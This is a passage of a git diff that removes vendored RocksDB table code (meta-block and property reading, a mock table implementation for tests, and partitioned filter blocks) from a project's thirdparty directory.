-      {TablePropertiesNames::kNumDataBlocks,
-       &new_table_properties->num_data_blocks},
-      {TablePropertiesNames::kNumEntries, &new_table_properties->num_entries},
-      {TablePropertiesNames::kFormatVersion,
-       &new_table_properties->format_version},
-      {TablePropertiesNames::kFixedKeyLen,
-       &new_table_properties->fixed_key_len},
-      {TablePropertiesNames::kColumnFamilyId,
-       &new_table_properties->column_family_id},
-      {TablePropertiesNames::kCreationTime,
-       &new_table_properties->creation_time},
-      {TablePropertiesNames::kOldestKeyTime,
-       &new_table_properties->oldest_key_time},
-  };
-
-  std::string last_key;
-  for (iter.SeekToFirst(); iter.Valid(); iter.Next()) {
-    s = iter.status();
-    if (!s.ok()) {
-      break;
-    }
-
-    auto key = iter.key().ToString();
-    // properties block is strictly sorted with no duplicate key.
-    assert(last_key.empty() ||
-           BytewiseComparator()->Compare(key, last_key) > 0);
-    last_key = key;
-
-    auto raw_val = iter.value();
-    auto pos = predefined_uint64_properties.find(key);
-
-    new_table_properties->properties_offsets.insert(
-        {key, handle.offset() + iter.ValueOffset()});
-
-    if (pos != predefined_uint64_properties.end()) {
-      // handle predefined rocksdb properties
-      uint64_t val;
-      if (!GetVarint64(&raw_val, &val)) {
-        // skip malformed value
-        auto error_msg =
-          "Detect malformed value in properties meta-block:"
-          "\tkey: " + key + "\tval: " + raw_val.ToString();
-        ROCKS_LOG_ERROR(ioptions.info_log, "%s", error_msg.c_str());
-        continue;
-      }
-      *(pos->second) = val;
-    } else if (key == TablePropertiesNames::kFilterPolicy) {
-      new_table_properties->filter_policy_name = raw_val.ToString();
-    } else if (key == TablePropertiesNames::kColumnFamilyName) {
-      new_table_properties->column_family_name = raw_val.ToString();
-    } else if (key == TablePropertiesNames::kComparator) {
-      new_table_properties->comparator_name = raw_val.ToString();
-    } else if (key == TablePropertiesNames::kMergeOperator) {
-      new_table_properties->merge_operator_name = raw_val.ToString();
-    } else if (key == TablePropertiesNames::kPrefixExtractorName) {
-      new_table_properties->prefix_extractor_name = raw_val.ToString();
-    } else if (key == TablePropertiesNames::kPropertyCollectors) {
-      new_table_properties->property_collectors_names = raw_val.ToString();
-    } else if (key == TablePropertiesNames::kCompression) {
-      new_table_properties->compression_name = raw_val.ToString();
-    } else {
-      // handle user-collected properties
-      new_table_properties->user_collected_properties.insert(
-          {key, raw_val.ToString()});
-    }
-  }
-  if (s.ok()) {
-    *table_properties = new_table_properties;
-  } else {
-    delete new_table_properties;
-  }
-
-  return s;
-}
-
-Status ReadTableProperties(RandomAccessFileReader* file, uint64_t file_size,
-                           uint64_t table_magic_number,
-                           const ImmutableCFOptions &ioptions,
-                           TableProperties** properties) {
-  // -- Read metaindex block
-  Footer footer;
-  auto s = ReadFooterFromFile(file, nullptr /* prefetch_buffer */, file_size,
-                              &footer, table_magic_number);
-  if (!s.ok()) {
-    return s;
-  }
-
-  auto metaindex_handle = footer.metaindex_handle();
-  BlockContents metaindex_contents;
-  ReadOptions read_options;
-  read_options.verify_checksums = false;
-  s = ReadBlockContents(file, nullptr /* prefetch_buffer */, footer,
-                        read_options, metaindex_handle, &metaindex_contents,
-                        ioptions, false /* decompress */);
-  if (!s.ok()) {
-    return s;
-  }
-  Block metaindex_block(std::move(metaindex_contents),
-                        kDisableGlobalSequenceNumber);
-  std::unique_ptr<InternalIterator> meta_iter(
-      metaindex_block.NewIterator(BytewiseComparator()));
-
-  // -- Read property block
-  bool found_properties_block = true;
-  s = SeekToPropertiesBlock(meta_iter.get(), &found_properties_block);
-  if (!s.ok()) {
-    return s;
-  }
-
-  TableProperties table_properties;
-  if (found_properties_block == true) {
-    s = ReadProperties(meta_iter->value(), file, nullptr /* prefetch_buffer */,
-                       footer, ioptions, properties);
-  } else {
-    s = Status::NotFound();
-  }
-
-  return s;
-}
-
-Status FindMetaBlock(InternalIterator* meta_index_iter,
-                     const std::string& meta_block_name,
-                     BlockHandle* block_handle) {
-  meta_index_iter->Seek(meta_block_name);
-  if (meta_index_iter->status().ok() && meta_index_iter->Valid() &&
-      meta_index_iter->key() == meta_block_name) {
-    Slice v = meta_index_iter->value();
-    return block_handle->DecodeFrom(&v);
-  } else {
-    return Status::Corruption("Cannot find the meta block", meta_block_name);
-  }
-}
-
-Status FindMetaBlock(RandomAccessFileReader* file, uint64_t file_size,
-                     uint64_t table_magic_number,
-                     const ImmutableCFOptions &ioptions,
-                     const std::string& meta_block_name,
-                     BlockHandle* block_handle) {
-  Footer footer;
-  auto s = ReadFooterFromFile(file, nullptr /* prefetch_buffer */, file_size,
-                              &footer, table_magic_number);
-  if (!s.ok()) {
-    return s;
-  }
-
-  auto metaindex_handle = footer.metaindex_handle();
-  BlockContents metaindex_contents;
-  ReadOptions read_options;
-  read_options.verify_checksums = false;
-  s = ReadBlockContents(file, nullptr /* prefetch_buffer */, footer,
-                        read_options, metaindex_handle, &metaindex_contents,
-                        ioptions, false /* do decompression */);
-  if (!s.ok()) {
-    return s;
-  }
-  Block metaindex_block(std::move(metaindex_contents),
-                        kDisableGlobalSequenceNumber);
-
-  std::unique_ptr<InternalIterator> meta_iter;
-  meta_iter.reset(metaindex_block.NewIterator(BytewiseComparator()));
-
-  return FindMetaBlock(meta_iter.get(), meta_block_name, block_handle);
-}
-
-Status ReadMetaBlock(RandomAccessFileReader* file,
-                     FilePrefetchBuffer* prefetch_buffer, uint64_t file_size,
-                     uint64_t table_magic_number,
-                     const ImmutableCFOptions& ioptions,
-                     const std::string& meta_block_name,
-                     BlockContents* contents) {
-  Status status;
-  Footer footer;
-  status = ReadFooterFromFile(file, prefetch_buffer, file_size, &footer,
-                              table_magic_number);
-  if (!status.ok()) {
-    return status;
-  }
-
-  // Reading metaindex block
-  auto metaindex_handle = footer.metaindex_handle();
-  BlockContents metaindex_contents;
-  ReadOptions read_options;
-  read_options.verify_checksums = false;
-  status = ReadBlockContents(file, prefetch_buffer, footer, read_options,
-                             metaindex_handle, &metaindex_contents, ioptions,
-                             false /* decompress */);
-  if (!status.ok()) {
-    return status;
-  }
-
-  // Finding metablock
-  Block metaindex_block(std::move(metaindex_contents),
-                        kDisableGlobalSequenceNumber);
-
-  std::unique_ptr<InternalIterator> meta_iter;
-  meta_iter.reset(metaindex_block.NewIterator(BytewiseComparator()));
-
-  BlockHandle block_handle;
-  status = FindMetaBlock(meta_iter.get(), meta_block_name, &block_handle);
-
-  if (!status.ok()) {
-    return status;
-  }
-
-  // Reading metablock
-  return ReadBlockContents(file, prefetch_buffer, footer, read_options,
-                           block_handle, contents, ioptions,
-                           false /* decompress */);
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/meta_blocks.h b/thirdparty/rocksdb/table/meta_blocks.h
deleted file mode 100644
index 220985d..0000000
--- a/thirdparty/rocksdb/table/meta_blocks.h
+++ /dev/null
@@ -1,132 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#include <map>
-#include <memory>
-#include <string>
-#include <vector>
-
-#include "db/builder.h"
-#include "db/table_properties_collector.h"
-#include "util/kv_map.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/options.h"
-#include "rocksdb/slice.h"
-#include "table/block_builder.h"
-#include "table/format.h"
-
-namespace rocksdb {
-
-class BlockBuilder;
-class BlockHandle;
-class Env;
-class Footer;
-class Logger;
-class RandomAccessFile;
-struct TableProperties;
-class InternalIterator;
-
-class MetaIndexBuilder {
- public:
-  MetaIndexBuilder(const MetaIndexBuilder&) = delete;
-  MetaIndexBuilder& operator=(const MetaIndexBuilder&) = delete;
-
-  MetaIndexBuilder();
-  void Add(const std::string& key, const BlockHandle& handle);
-
-  // Write all the added key/value pairs to the block and return the contents
-  // of the block.
-  Slice Finish();
-
- private:
-  // store the sorted key/handle of the metablocks.
-  stl_wrappers::KVMap meta_block_handles_;
-  std::unique_ptr<BlockBuilder> meta_index_block_;
-};
-
-class PropertyBlockBuilder {
- public:
-  PropertyBlockBuilder(const PropertyBlockBuilder&) = delete;
-  PropertyBlockBuilder& operator=(const PropertyBlockBuilder&) = delete;
-
-  PropertyBlockBuilder();
-
-  void AddTableProperty(const TableProperties& props);
-  void Add(const std::string& key, uint64_t value);
-  void Add(const std::string& key, const std::string& value);
-  void Add(const UserCollectedProperties& user_collected_properties);
-
-  // Write all the added entries to the block and return the block contents
-  Slice Finish();
-
- private:
-  std::unique_ptr<BlockBuilder> properties_block_;
-  stl_wrappers::KVMap props_;
-};
-
-// Were we encounter any error occurs during user-defined statistics collection,
-// we'll write the warning message to info log.
-void LogPropertiesCollectionError(
-    Logger* info_log, const std::string& method, const std::string& name);
-
-// Utility functions help table builder to trigger batch events for user
-// defined property collectors.
-// Return value indicates if there is any error occurred; if error occurred,
-// the warning message will be logged.
-// NotifyCollectTableCollectorsOnAdd() triggers the `Add` event for all
-// property collectors.
-bool NotifyCollectTableCollectorsOnAdd(
-    const Slice& key, const Slice& value, uint64_t file_size,
-    const std::vector<std::unique_ptr<IntTblPropCollector>>& collectors,
-    Logger* info_log);
-
-// NotifyCollectTableCollectorsOnAdd() triggers the `Finish` event for all
-// property collectors. The collected properties will be added to `builder`.
-bool NotifyCollectTableCollectorsOnFinish(
-    const std::vector<std::unique_ptr<IntTblPropCollector>>& collectors,
-    Logger* info_log, PropertyBlockBuilder* builder);
-
-// Read the properties from the table.
-// @returns a status to indicate if the operation succeeded. On success,
-//          *table_properties will point to a heap-allocated TableProperties
-//          object, otherwise value of `table_properties` will not be modified.
-Status ReadProperties(const Slice& handle_value, RandomAccessFileReader* file,
-                      FilePrefetchBuffer* prefetch_buffer, const Footer& footer,
-                      const ImmutableCFOptions& ioptions,
-                      TableProperties** table_properties);
-
-// Directly read the properties from the properties block of a plain table.
-// @returns a status to indicate if the operation succeeded. On success,
-//          *table_properties will point to a heap-allocated TableProperties
-//          object, otherwise value of `table_properties` will not be modified.
-Status ReadTableProperties(RandomAccessFileReader* file, uint64_t file_size,
-                           uint64_t table_magic_number,
-                           const ImmutableCFOptions &ioptions,
-                           TableProperties** properties);
-
-// Find the meta block from the meta index block.
-Status FindMetaBlock(InternalIterator* meta_index_iter,
-                     const std::string& meta_block_name,
-                     BlockHandle* block_handle);
-
-// Find the meta block
-Status FindMetaBlock(RandomAccessFileReader* file, uint64_t file_size,
-                     uint64_t table_magic_number,
-                     const ImmutableCFOptions &ioptions,
-                     const std::string& meta_block_name,
-                     BlockHandle* block_handle);
-
-// Read the specified meta block with name meta_block_name
-// from `file` and initialize `contents` with contents of this block.
-// Return Status::OK in case of success.
-Status ReadMetaBlock(RandomAccessFileReader* file,
-                     FilePrefetchBuffer* prefetch_buffer, uint64_t file_size,
-                     uint64_t table_magic_number,
-                     const ImmutableCFOptions& ioptions,
-                     const std::string& meta_block_name,
-                     BlockContents* contents);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/mock_table.cc b/thirdparty/rocksdb/table/mock_table.cc
deleted file mode 100644
index 86c3808..0000000
--- a/thirdparty/rocksdb/table/mock_table.cc
+++ /dev/null
@@ -1,142 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "table/mock_table.h"
-
-#include "db/dbformat.h"
-#include "port/port.h"
-#include "rocksdb/table_properties.h"
-#include "table/get_context.h"
-#include "util/coding.h"
-#include "util/file_reader_writer.h"
-
-namespace rocksdb {
-namespace mock {
-
-namespace {
-
-const InternalKeyComparator icmp_(BytewiseComparator());
-
-}  // namespace
-
-stl_wrappers::KVMap MakeMockFile(
-    std::initializer_list<std::pair<const std::string, std::string>> l) {
-  return stl_wrappers::KVMap(l, stl_wrappers::LessOfComparator(&icmp_));
-}
-
-InternalIterator* MockTableReader::NewIterator(const ReadOptions&,
-                                               Arena* arena,
-                                               bool skip_filters) {
-  return new MockTableIterator(table_);
-}
-
-Status MockTableReader::Get(const ReadOptions&, const Slice& key,
-                            GetContext* get_context, bool skip_filters) {
-  std::unique_ptr<MockTableIterator> iter(new MockTableIterator(table_));
-  for (iter->Seek(key); iter->Valid(); iter->Next()) {
-    ParsedInternalKey parsed_key;
-    if (!ParseInternalKey(iter->key(), &parsed_key)) {
-      return Status::Corruption(Slice());
-    }
-
-    if (!get_context->SaveValue(parsed_key, iter->value())) {
-      break;
-    }
-  }
-  return Status::OK();
-}
-
-std::shared_ptr<const TableProperties> MockTableReader::GetTableProperties()
-    const {
-  return std::shared_ptr<const TableProperties>(new TableProperties());
-}
-
-MockTableFactory::MockTableFactory() : next_id_(1) {}
-
-Status MockTableFactory::NewTableReader(
-    const TableReaderOptions& table_reader_options,
-    unique_ptr<RandomAccessFileReader>&& file, uint64_t file_size,
-    unique_ptr<TableReader>* table_reader,
-    bool prefetch_index_and_filter_in_cache) const {
-  uint32_t id = GetIDFromFile(file.get());
-
-  MutexLock lock_guard(&file_system_.mutex);
-
-  auto it = file_system_.files.find(id);
-  if (it == file_system_.files.end()) {
-    return Status::IOError("Mock file not found");
-  }
-
-  table_reader->reset(new MockTableReader(it->second));
-
-  return Status::OK();
-}
-
-TableBuilder* MockTableFactory::NewTableBuilder(
-    const TableBuilderOptions& table_builder_options, uint32_t column_family_id,
-    WritableFileWriter* file) const {
-  uint32_t id = GetAndWriteNextID(file);
-
-  return new MockTableBuilder(id, &file_system_);
-}
-
-Status MockTableFactory::CreateMockTable(Env* env, const std::string& fname,
-                                         stl_wrappers::KVMap file_contents) {
-  std::unique_ptr<WritableFile> file;
-  auto s = env->NewWritableFile(fname, &file, EnvOptions());
-  if (!s.ok()) {
-    return s;
-  }
-
-  WritableFileWriter file_writer(std::move(file), EnvOptions());
-
-  uint32_t id = GetAndWriteNextID(&file_writer);
-  file_system_.files.insert({id, std::move(file_contents)});
-  return Status::OK();
-}
-
-uint32_t MockTableFactory::GetAndWriteNextID(WritableFileWriter* file) const {
-  uint32_t next_id = next_id_.fetch_add(1);
-  char buf[4];
-  EncodeFixed32(buf, next_id);
-  file->Append(Slice(buf, 4));
-  return next_id;
-}
-
-uint32_t MockTableFactory::GetIDFromFile(RandomAccessFileReader* file) const {
-  char buf[4];
-  Slice result;
-  file->Read(0, 4, &result, buf);
-  assert(result.size() == 4);
-  return DecodeFixed32(buf);
-}
-
-void MockTableFactory::AssertSingleFile(
-    const stl_wrappers::KVMap& file_contents) {
-  ASSERT_EQ(file_system_.files.size(), 1U);
-  ASSERT_EQ(file_contents, file_system_.files.begin()->second);
-}
-
-void MockTableFactory::AssertLatestFile(
-    const stl_wrappers::KVMap& file_contents) {
-  ASSERT_GE(file_system_.files.size(), 1U);
-  auto latest = file_system_.files.end();
-  --latest;
-
-  if (file_contents != latest->second) {
-    std::cout << "Wrong content! Content of latest file:" << std::endl;
-    for (const auto& kv : latest->second) {
-      ParsedInternalKey ikey;
-      std::string key, value;
-      std::tie(key, value) = kv;
-      ParseInternalKey(Slice(key), &ikey);
-      std::cout << ikey.DebugString(false) << " -> " << value << std::endl;
-    }
-    FAIL();
-  }
-}
-
-}  // namespace mock
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/mock_table.h b/thirdparty/rocksdb/table/mock_table.h
deleted file mode 100644
index 71609a1..0000000
--- a/thirdparty/rocksdb/table/mock_table.h
+++ /dev/null
@@ -1,194 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#include <algorithm>
-#include <atomic>
-#include <map>
-#include <memory>
-#include <set>
-#include <string>
-#include <utility>
-
-#include "util/kv_map.h"
-#include "port/port.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/table.h"
-#include "table/internal_iterator.h"
-#include "table/table_builder.h"
-#include "table/table_reader.h"
-#include "util/mutexlock.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-namespace mock {
-
-stl_wrappers::KVMap MakeMockFile(
-    std::initializer_list<std::pair<const std::string, std::string>> l = {});
-
-struct MockTableFileSystem {
-  port::Mutex mutex;
-  std::map<uint32_t, stl_wrappers::KVMap> files;
-};
-
-class MockTableReader : public TableReader {
- public:
-  explicit MockTableReader(const stl_wrappers::KVMap& table) : table_(table) {}
-
-  InternalIterator* NewIterator(const ReadOptions&,
-                                Arena* arena,
-                                bool skip_filters = false) override;
-
-  Status Get(const ReadOptions&, const Slice& key, GetContext* get_context,
-             bool skip_filters = false) override;
-
-  uint64_t ApproximateOffsetOf(const Slice& key) override { return 0; }
-
-  virtual size_t ApproximateMemoryUsage() const override { return 0; }
-
-  void SetupForCompaction() override {}
-
-  std::shared_ptr<const TableProperties> GetTableProperties() const override;
-
-  ~MockTableReader() {}
-
- private:
-  const stl_wrappers::KVMap& table_;
-};
-
-class MockTableIterator : public InternalIterator {
- public:
-  explicit MockTableIterator(const stl_wrappers::KVMap& table) : table_(table) {
-    itr_ = table_.end();
-  }
-
-  bool Valid() const override { return itr_ != table_.end(); }
-
-  void SeekToFirst() override { itr_ = table_.begin(); }
-
-  void SeekToLast() override {
-    itr_ = table_.end();
-    --itr_;
-  }
-
-  void Seek(const Slice& target) override {
-    std::string str_target(target.data(), target.size());
-    itr_ = table_.lower_bound(str_target);
-  }
-
-  void SeekForPrev(const Slice& target) override {
-    std::string str_target(target.data(), target.size());
-    itr_ = table_.upper_bound(str_target);
-    Prev();
-  }
-
-  void Next() override { ++itr_; }
-
-  void Prev() override {
-    if (itr_ == table_.begin()) {
-      itr_ = table_.end();
-    } else {
-      --itr_;
-    }
-  }
-
-  Slice key() const override { return Slice(itr_->first); }
-
-  Slice value() const override { return Slice(itr_->second); }
-
-  Status status() const override { return Status::OK(); }
-
- private:
-  const stl_wrappers::KVMap& table_;
-  stl_wrappers::KVMap::const_iterator itr_;
-};
-
-class MockTableBuilder : public TableBuilder {
- public:
-  MockTableBuilder(uint32_t id, MockTableFileSystem* file_system)
-      : id_(id), file_system_(file_system) {
-    table_ = MakeMockFile({});
-  }
-
-  // REQUIRES: Either Finish() or Abandon() has been called.
-  ~MockTableBuilder() {}
-
-  // Add key,value to the table being constructed.
-  // REQUIRES: key is after any previously added key according to comparator.
-  // REQUIRES: Finish(), Abandon() have not been called
-  void Add(const Slice& key, const Slice& value) override {
-    table_.insert({key.ToString(), value.ToString()});
-  }
-
-  // Return non-ok iff some error has been detected.
-  Status status() const override { return Status::OK(); }
-
-  Status Finish() override {
-    MutexLock lock_guard(&file_system_->mutex);
-    file_system_->files.insert({id_, table_});
-    return Status::OK();
-  }
-
-  void Abandon() override {}
-
-  uint64_t NumEntries() const override { return table_.size(); }
-
-  uint64_t FileSize() const override { return table_.size(); }
-
-  TableProperties GetTableProperties() const override {
-    return TableProperties();
-  }
-
- private:
-  uint32_t id_;
-  MockTableFileSystem* file_system_;
-  stl_wrappers::KVMap table_;
-};
-
-class MockTableFactory : public TableFactory {
- public:
-  MockTableFactory();
-  const char* Name() const override { return "MockTable"; }
-  Status NewTableReader(
-      const TableReaderOptions& table_reader_options,
-      unique_ptr<RandomAccessFileReader>&& file, uint64_t file_size,
-      unique_ptr<TableReader>* table_reader,
-      bool prefetch_index_and_filter_in_cache = true) const override;
-  TableBuilder* NewTableBuilder(
-      const TableBuilderOptions& table_builder_options,
-      uint32_t column_familly_id, WritableFileWriter* file) const override;
-
-  // This function will directly create mock table instead of going through
-  // MockTableBuilder. file_contents has to have a format of <internal_key,
-  // value>. Those key-value pairs will then be inserted into the mock table.
-  Status CreateMockTable(Env* env, const std::string& fname,
-                         stl_wrappers::KVMap file_contents);
-
-  virtual Status SanitizeOptions(
-      const DBOptions& db_opts,
-      const ColumnFamilyOptions& cf_opts) const override {
-    return Status::OK();
-  }
-
-  virtual std::string GetPrintableTableOptions() const override {
-    return std::string();
-  }
-
-  // This function will assert that only a single file exists and that the
-  // contents are equal to file_contents
-  void AssertSingleFile(const stl_wrappers::KVMap& file_contents);
-  void AssertLatestFile(const stl_wrappers::KVMap& file_contents);
-
- private:
-  uint32_t GetAndWriteNextID(WritableFileWriter* file) const;
-  uint32_t GetIDFromFile(RandomAccessFileReader* file) const;
-
-  mutable MockTableFileSystem file_system_;
-  mutable std::atomic<uint32_t> next_id_;
-};
-
-}  // namespace mock
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/partitioned_filter_block.cc b/thirdparty/rocksdb/table/partitioned_filter_block.cc
deleted file mode 100644
index 2022459..0000000
--- a/thirdparty/rocksdb/table/partitioned_filter_block.cc
+++ /dev/null
@@ -1,311 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "table/partitioned_filter_block.h"
-
-#include <utility>
-
-#include "monitoring/perf_context_imp.h"
-#include "port/port.h"
-#include "rocksdb/filter_policy.h"
-#include "table/block.h"
-#include "table/block_based_table_reader.h"
-#include "util/coding.h"
-
-namespace rocksdb {
-
-PartitionedFilterBlockBuilder::PartitionedFilterBlockBuilder(
-    const SliceTransform* prefix_extractor, bool whole_key_filtering,
-    FilterBitsBuilder* filter_bits_builder, int index_block_restart_interval,
-    PartitionedIndexBuilder* const p_index_builder,
-    const uint32_t partition_size)
-    : FullFilterBlockBuilder(prefix_extractor, whole_key_filtering,
-                             filter_bits_builder),
-      index_on_filter_block_builder_(index_block_restart_interval),
-      p_index_builder_(p_index_builder),
-      filters_in_partition_(0) {
-  filters_per_partition_ =
-      filter_bits_builder_->CalculateNumEntry(partition_size);
-}
-
-PartitionedFilterBlockBuilder::~PartitionedFilterBlockBuilder() {}
-
-void PartitionedFilterBlockBuilder::MaybeCutAFilterBlock() {
-  // Use == to send the request only once
-  if (filters_in_partition_ == filters_per_partition_) {
-    // Currently only index builder is in charge of cutting a partition. We keep
-    // requesting until it is granted.
-    p_index_builder_->RequestPartitionCut();
-  }
-  if (!p_index_builder_->ShouldCutFilterBlock()) {
-    return;
-  }
-  filter_gc.push_back(std::unique_ptr<const char[]>(nullptr));
-  Slice filter = filter_bits_builder_->Finish(&filter_gc.back());
-  std::string& index_key = p_index_builder_->GetPartitionKey();
-  filters.push_back({index_key, filter});
-  filters_in_partition_ = 0;
-}
-
-void PartitionedFilterBlockBuilder::AddKey(const Slice& key) {
-  MaybeCutAFilterBlock();
-  filter_bits_builder_->AddKey(key);
-  filters_in_partition_++;
-}
-
-Slice PartitionedFilterBlockBuilder::Finish(
-    const BlockHandle& last_partition_block_handle, Status* status) {
-  if (finishing_filters == true) {
-    // Record the handle of the last written filter block in the index
-    FilterEntry& last_entry = filters.front();
-    std::string handle_encoding;
-    last_partition_block_handle.EncodeTo(&handle_encoding);
-    index_on_filter_block_builder_.Add(last_entry.key, handle_encoding);
-    filters.pop_front();
-  } else {
-    MaybeCutAFilterBlock();
-  }
-  // If there is no filter partition left, then return the index on filter
-  // partitions
-  if (UNLIKELY(filters.empty())) {
-    *status = Status::OK();
-    if (finishing_filters) {
-      return index_on_filter_block_builder_.Finish();
-    } else {
-      // This is the rare case where no key was added to the filter
-      return Slice();
-    }
-  } else {
-    // Return the next filter partition in line and set Incomplete() status to
-    // indicate we expect more calls to Finish
-    *status = Status::Incomplete();
-    finishing_filters = true;
-    return filters.front().filter;
-  }
-}
-
-PartitionedFilterBlockReader::PartitionedFilterBlockReader(
-    const SliceTransform* prefix_extractor, bool _whole_key_filtering,
-    BlockContents&& contents, FilterBitsReader* filter_bits_reader,
-    Statistics* stats, const Comparator& comparator,
-    const BlockBasedTable* table)
-    : FilterBlockReader(contents.data.size(), stats, _whole_key_filtering),
-      prefix_extractor_(prefix_extractor),
-      comparator_(comparator),
-      table_(table) {
-  idx_on_fltr_blk_.reset(new Block(std::move(contents),
-                                   kDisableGlobalSequenceNumber,
-                                   0 /* read_amp_bytes_per_bit */, stats));
-}
-
-PartitionedFilterBlockReader::~PartitionedFilterBlockReader() {
-  // TODO(myabandeh): if instead of filter object we store only the blocks in
-  // block cache, then we don't have to manually earse them from block cache
-  // here.
-  auto block_cache = table_->rep_->table_options.block_cache.get();
-  if (UNLIKELY(block_cache == nullptr)) {
-    return;
-  }
-  char cache_key[BlockBasedTable::kMaxCacheKeyPrefixSize + kMaxVarint64Length];
-  BlockIter biter;
-  BlockHandle handle;
-  idx_on_fltr_blk_->NewIterator(&comparator_, &biter, true);
-  biter.SeekToFirst();
-  for (; biter.Valid(); biter.Next()) {
-    auto input = biter.value();
-    auto s = handle.DecodeFrom(&input);
-    assert(s.ok());
-    if (!s.ok()) {
-      continue;
-    }
-    auto key = BlockBasedTable::GetCacheKey(table_->rep_->cache_key_prefix,
-                                            table_->rep_->cache_key_prefix_size,
-                                            handle, cache_key);
-    block_cache->Erase(key);
-  }
-}
-
-bool PartitionedFilterBlockReader::KeyMayMatch(
-    const Slice& key, uint64_t block_offset, const bool no_io,
-    const Slice* const const_ikey_ptr) {
-  assert(const_ikey_ptr != nullptr);
-  assert(block_offset == kNotValid);
-  if (!whole_key_filtering_) {
-    return true;
-  }
-  if (UNLIKELY(idx_on_fltr_blk_->size() == 0)) {
-    return true;
-  }
-  auto filter_handle = GetFilterPartitionHandle(*const_ikey_ptr);
-  if (UNLIKELY(filter_handle.size() == 0)) {  // key is out of range
-    return false;
-  }
-  bool cached = false;
-  auto filter_partition = GetFilterPartition(nullptr /* prefetch_buffer */,
-                                             &filter_handle, no_io, &cached);
-  if (UNLIKELY(!filter_partition.value)) {
-    return true;
-  }
-  auto res = filter_partition.value->KeyMayMatch(key, block_offset, no_io);
-  if (cached) {
-    return res;
-  }
-  if (LIKELY(filter_partition.IsSet())) {
-    filter_partition.Release(table_->rep_->table_options.block_cache.get());
-  } else {
-    delete filter_partition.value;
-  }
-  return res;
-}
-
-bool PartitionedFilterBlockReader::PrefixMayMatch(
-    const Slice& prefix, uint64_t block_offset, const bool no_io,
-    const Slice* const const_ikey_ptr) {
-  assert(const_ikey_ptr != nullptr);
-  assert(block_offset == kNotValid);
-  if (!prefix_extractor_) {
-    return true;
-  }
-  if (UNLIKELY(idx_on_fltr_blk_->size() == 0)) {
-    return true;
-  }
-  auto filter_handle = GetFilterPartitionHandle(*const_ikey_ptr);
-  if (UNLIKELY(filter_handle.size() == 0)) {  // prefix is out of range
-    return false;
-  }
-  bool cached = false;
-  auto filter_partition = GetFilterPartition(nullptr /* prefetch_buffer */,
-                                             &filter_handle, no_io, &cached);
-  if (UNLIKELY(!filter_partition.value)) {
-    return true;
-  }
-  auto res = filter_partition.value->PrefixMayMatch(prefix, kNotValid, no_io);
-  if (cached) {
-    return res;
-  }
-  if (LIKELY(filter_partition.IsSet())) {
-    filter_partition.Release(table_->rep_->table_options.block_cache.get());
-  } else {
-    delete filter_partition.value;
-  }
-  return res;
-}
-
-Slice PartitionedFilterBlockReader::GetFilterPartitionHandle(
-    const Slice& entry) {
-  BlockIter iter;
-  idx_on_fltr_blk_->NewIterator(&comparator_, &iter, true);
-  iter.Seek(entry);
-  if (UNLIKELY(!iter.Valid())) {
-    return Slice();
-  }
-  assert(iter.Valid());
-  Slice handle_value = iter.value();
-  return handle_value;
-}
-
-BlockBasedTable::CachableEntry<FilterBlockReader>
-PartitionedFilterBlockReader::GetFilterPartition(
-    FilePrefetchBuffer* prefetch_buffer, Slice* handle_value, const bool no_io,
-    bool* cached) {
-  BlockHandle fltr_blk_handle;
-  auto s = fltr_blk_handle.DecodeFrom(handle_value);
-  assert(s.ok());
-  const bool is_a_filter_partition = true;
-  auto block_cache = table_->rep_->table_options.block_cache.get();
-  if (LIKELY(block_cache != nullptr)) {
-    if (filter_map_.size() != 0) {
-      auto iter = filter_map_.find(fltr_blk_handle.offset());
-      // This is a possible scenario since block cache might not have had space
-      // for the partition
-      if (iter != filter_map_.end()) {
-        PERF_COUNTER_ADD(block_cache_hit_count, 1);
-        RecordTick(statistics(), BLOCK_CACHE_FILTER_HIT);
-        RecordTick(statistics(), BLOCK_CACHE_HIT);
-        RecordTick(statistics(), BLOCK_CACHE_BYTES_READ,
-                   block_cache->GetUsage(iter->second.cache_handle));
-        *cached = true;
-        return iter->second;
-      }
-    }
-    return table_->GetFilter(/*prefetch_buffer*/ nullptr, fltr_blk_handle,
-                             is_a_filter_partition, no_io);
-  } else {
-    auto filter = table_->ReadFilter(prefetch_buffer, fltr_blk_handle,
-                                     is_a_filter_partition);
-    return {filter, nullptr};
-  }
-}
-
-size_t PartitionedFilterBlockReader::ApproximateMemoryUsage() const {
-  return idx_on_fltr_blk_->size();
-}
-
-// TODO(myabandeh): merge this with the same function in IndexReader
-void PartitionedFilterBlockReader::CacheDependencies(bool pin) {
-  // Before read partitions, prefetch them to avoid lots of IOs
-  auto rep = table_->rep_;
-  BlockIter biter;
-  BlockHandle handle;
-  idx_on_fltr_blk_->NewIterator(&comparator_, &biter, true);
-  // Index partitions are assumed to be consecuitive. Prefetch them all.
-  // Read the first block offset
-  biter.SeekToFirst();
-  Slice input = biter.value();
-  Status s = handle.DecodeFrom(&input);
-  assert(s.ok());
-  if (!s.ok()) {
-    ROCKS_LOG_WARN(rep->ioptions.info_log,
-                   "Could not read first index partition");
-    return;
-  }
-  uint64_t prefetch_off = handle.offset();
-
-  // Read the last block's offset
-  biter.SeekToLast();
-  input = biter.value();
-  s = handle.DecodeFrom(&input);
-  assert(s.ok());
-  if (!s.ok()) {
-    ROCKS_LOG_WARN(rep->ioptions.info_log,
